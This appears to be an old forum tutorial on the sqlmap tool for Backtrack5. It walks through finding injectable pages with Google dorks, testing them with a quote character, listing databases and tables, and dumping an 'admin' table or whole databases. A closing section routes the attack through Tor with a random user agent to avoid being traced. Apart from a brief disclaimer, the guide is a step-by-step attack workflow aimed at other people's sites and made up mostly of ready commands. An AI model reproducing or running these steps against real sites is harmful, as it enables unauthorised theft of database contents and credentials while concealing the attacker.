SqlMap

1. This tutorial is for educational purposes only. This information is not intended to aid in any form of illegal activity.
2. SQLMAP For Dummies v1.0 - By Matrix -
3. http://www.twitter.com/TheAnonMatrix
4. Required for use: Backtrack5 R1.
5. Start your Backtrack5 R1 (BT5) and start sqlmap, it can be found in /pentest/database/sqlmap/.
6. Now lets get started!
7. First we need a webpage, this normally is done by hand or by using dorks in google. To find out if a page is vulnerable to an injection we do this:
8. http://localhost.com/index.php?id=1337'
9. Notice the ' here: ^
10. This should give you a pretty error and a good start!
11. Lets open sqlmap!
12. So the first you need to learn is options, or settings you have to apply in sqlmap. The base is:
13. python sqlmap.py -u <website>
14. With a website we would simply do it like this
15. python sqlmap.py -u http://localhost/index.php?id=1337
16. (note we did not add the ' here)
17. -u stands for Url and tells sqlmap THIS is our url. But we have to add more options for sqlmap to work:
18. (note the following options use double dashes)
19. --dbs to find DataBases
20. --users to find users.
21. python sqlmap.py -u http://localhost/index.php?id=1337 --dbs (and/or) --users
22. (for the sake of lenght we will be assuming you used --dbs in this tutorial)
23. After this command is ran you should come up with 0 results, or some results. If you read the text you might be able to find some databases, and if you do. Congratz!
24. Should look like this:
25. available databases [2]:
26. [*] database1
27. [*] database2
28. Now to the fun part!
29. python sqlmap.py -u http://localhost/index.php?id=1337 --tables -D database1
30. This tells the program to find tables (--tables) in database (-D) names: database1.
31. Once you execute this you will find (maybe) tons of tables. Locate the one you want...lets call it admin!
32. python sqlmap.py -u http://localhost/index.php?id=1337 -D database1 -T admin
33. Now you should see the info of the table admin. But now we should be able to dump it! This can be done by --dump or --dump-all.
34. Examples:
35. python sqlmap.py -u http://localhost/index.php?id=1337 --tables -D database1 --dump-all
36. python sqlmap.py -u http://localhost/index.php?id=1337 -D database1 -T admin --dump
37. --dump dumps the selected tables content, --dump-all dumps EVERYTHING!
38. But, we should be secure?
39. Tor with SQLMAP:
40. First find /etc/apt/sources.list open it and add
41. deb http://deb.torproject.org/torproject.org lucid main
42. Open the terminal and use this commandoes:
43. gpg --keyserver keys.gnupg.net --recv 886DDD89
44. gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
45. And now we need more commandos ran as root:
46. apt-get update
47. apt-get install tor tor-geoipdb
48. apt-get install polipo
49. Start tor: /etc/init.d/tor start grab the copy of this config file: https://gitweb.torproject.org/torbrowser.git/blob_plain/HEAD:/build-scripts/config/polipo.conf
50. Go to /etc/polipoconfig and replce the file with the one above. restart polipo: /etc/init.d/polipo restart
51. Congratz! now you can run sqlmap with TOR!
52. python sqlmap.py -u http://localhost/index.php?id=1337 -D database1 -T admin --dump --tor --random-agent
53. Happy safe hacking! ... and
54. I hope you found this tutorial helpful. We encourage you to experience other tutorials and get the best possible education you can.